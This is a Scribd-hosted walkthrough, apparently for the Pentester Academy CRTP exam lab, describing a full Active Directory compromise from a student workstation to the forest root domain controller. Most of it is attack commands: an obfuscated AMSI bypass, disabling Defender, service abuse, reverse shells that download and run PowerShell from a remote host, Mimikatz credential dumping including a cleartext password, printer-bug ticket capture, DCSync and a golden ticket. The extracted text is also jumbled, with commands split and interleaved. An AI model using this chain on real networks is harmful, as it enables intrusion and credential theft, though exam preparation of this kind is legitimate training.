Scribd
Upload
6K views10 pages

CRTP Exam Update

Uploaded by

fagbuleolakunle223
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
6K views10 pages

CRTP Exam Update

Uploaded by

fagbuleolakunle223
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
You are on page 1/ 10

Pentester Academy

Certified Red Team


Professional
Computer → user.garrison.castle.local
-----------------------------------------

PS: C:\Users\studentuser> powershell -ep bypass


PS: C:\Users\studentuser> sET-ItEM ( 'V'+'aR' +
'IA' +
'blE:1q2 + ) ( [TYpE]( "{1}{0}"-F'F','rE' ) )
' 'uZx'
GeT- ; ( "1Q2U +"zX ) -
( VariaBle "
)."A`ss`Embly"."GET`TY`Pe"(( " VaL
"{6}{3}{1}{4}{2}{0}{5}"
-
f'Util','A','Amsi','.Management.','utomation.','s','Sy
stem ' ) )."g`etf`iElD"( ( "{0}{2}{1}"
-f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f
'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"(
${n`ULl},${t`RuE} )

Host /AD/Tools/* on hfs.exe

PS: C:\Users\studentuser> . .\
PowerUp.ps1 PS: C:\Users\studentuser>
Invoke-AllChecks

PS: C:\Users\studentuser> Invoke-ServiceAbuse -Name


>>'vds'
Student user added to local administrators group
-UserName 'garrison\studentuser'
PS: C:\Users\studentuser> set-mppreference -
disablerealtime monitoring $true

Computer → uatsrv.garrison.castle.local
---------------------------------------------------

PS: C:\Users\studentuser> . .\
SharpHound.ps1 PS:
Upload .zip file to C:\Users\studentuser>
Bloodhound
Invoke-BloodHound

>> Student user can forcechangepassword of uatadmin (ACL auditing)


PS: C:\Users\studentuser> Set-ADAccountPassword -Identity
uatadmin
-NewPassword (ConvertTo-SecureString -AsPlainText "qwert@12345"

>> ps remote into the box as utadmin


>> net localgroup “Administrators” studentuser /add
>> net localgroup “Remote Desktop Users” studentuser /add

PS: C:\Users\studentuser> enter-pssession -ComputerName


uatsrv.garrison.castle.local
https://www.interfacett.com/blogs/how-to-remotely-enable-and-disable-rdp-r
PS: C:\Users\studentuser> Set-ItemProperty -Path
emote-desktop/
'HKLM:\System\CurrentControlSet\Control\Terminal Server' -name
"fDenyTSConnections" -value 0

Computer → devsrv.garrison.castle.local
---------------------------------------------------

>> RDP into uatsrv.garrison.local as uatadmin

>> Import PowerUpSQL and run ...

PS: C:\Users\studentuser> Import-module .\


PowerUpSql.ps1 PS C:\Users\studentuser> Get-
SQLInstanceDomain |
>> Import module and run powercat on studentuser machine

PS: C:\Users\studentuser> Powercat -l -v -p 443 -t 1000


Use Invoke-SQLOSCmd from Empire to trigger rev shell:
https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_sour
ce/lateral_movement/Invoke-SQLOSCmd.ps1

PS: C:\Users\studentuser> Invoke-SQLOCmd


-Verbose -Command
"powershell iex(New-Object
Net.WebClient).DownloadString(‘http://[REDACTED]/Invoke-PowerShe
llTcp.ps1’ -Instance devsrv.garrison.castle.local
>> Get back reverse shell as devsqladmin on devsrv which is localadmin
>> net localgroup “Administrators” studentuser /add
>> net localgroup “Remote Desktop Users” studentuser /add

PS: C:\Users\studentuser> enter-pssession -ComputerName


Run mimikatz on devsrv and get devsqladmin password in clear text:
uatsrv.garrison.castle.local
TheAccounttoRunMSSQLSvc1!
PS: C:\Users\studentuser> Set-ItemProperty -Path
'HKLM:\System\CurrentControlSet\Control\Terminal Server' -name
"fDenyTSConnections" -value 0
PS: C:\Users\studentuser> Invoke-Mimikatz

RDP into it after adding studentuser as local admin…


Computer → prodsrv.garrison.castle.local
---------------------------------------------------

Bloodhound shows devmanager@garrison.castle.local can be used for running


scheduled tasks

On devsrv run

PS: C:\Users\studentuser> Get-NetComputer -unconstrained


Import Mimikatz and run module to check forwardable host TGS available for prodsrv
prodsrv.garrison.castle.local
garrison-dc.garrison.castle.local
PS: C:\Users\studentuser> Invoke-Mimikatz -Command
Schedule a task on prodsrv as dev-manager…
‘“kereberos::list

PS: C:\Users\studentuser>schtasks /create /S


prodsrv.garrison.castle.local /SC Weekly /RU "GARRISON\
devmanager"
/TN "STCheck" /TR "powershell.exe -c 'iex (New-Object
Net.WebClient).DownloadString(''http://[Redacted]/Invoke-
PowerShellTc p.ps1''')'"
>> Import module and run powercat on studentuser machine

PS: C:\Users\studentuser> Powercat -l -v -p 443 -t 1000

>> Get reverse shell as devmanager on prodsrv

Computer → garrison-dc.garrison.castle.local
---------------------------------------------------

Once we get a foothold on Prodsrv run mimikatz on the box and capture DC machine
account hashes remember we have unconstrained delegation on prodsrv set too …

PS: C:\Users\devmanager> .\Rubeus.exe monitor


>>/interval:5
We will use MSRPRN to abuse the printer bug
/nowrap
PS: C:\Users\devmanager> .\MS-RPRN.exe
After u get the tgt use Rubeus to inject the tgt of garrison-dc$
\\garrison-dc.garrison.castle.local \\

.
PS: C:\Users\devmanager>.\Rubeus.exe ptt

We can now run DCSync attack against garrison-dc using the injected ticket

PS: C:\Users\devmanager> Invoke-Mimikatz -Command


With the given permissions now we can ps-remote into garrison-dc.garrison.castle.local
'"lsadump::dcsync

Again since we are local admin,


>> net localgroup “Administrators” studentuser /add
>> net localgroup “Remote Desktop Users” studentuser /add
And rdp into garrison-dc

Computer → castle-dc.castle.local
---------------------------------------------------

Now we can privesc to castle-dc using either krbtgt hash or using trust tickets

PS C:\Users\studentuser> Invoke-Mimikatz -Command


'"kerberos::golden
/user:Administrator /domain:garrison.castle.local /sid:
<garrison
domain sid here> /sids: <enterprise admin sid here> /krbtgt:
<krbtgt hash obtained above here>
Next use ptt module mimikatz

PS C:\Users\studentuser> Invoke-Mimikatz -Command


Query wmi or we can goC:\Users\studentuser\krbtgt_tkt.kirbi"'
'"kerberos::ptt the scheduled task way as mentioned earlier in case we need a
shell

THANK YOU

You might also like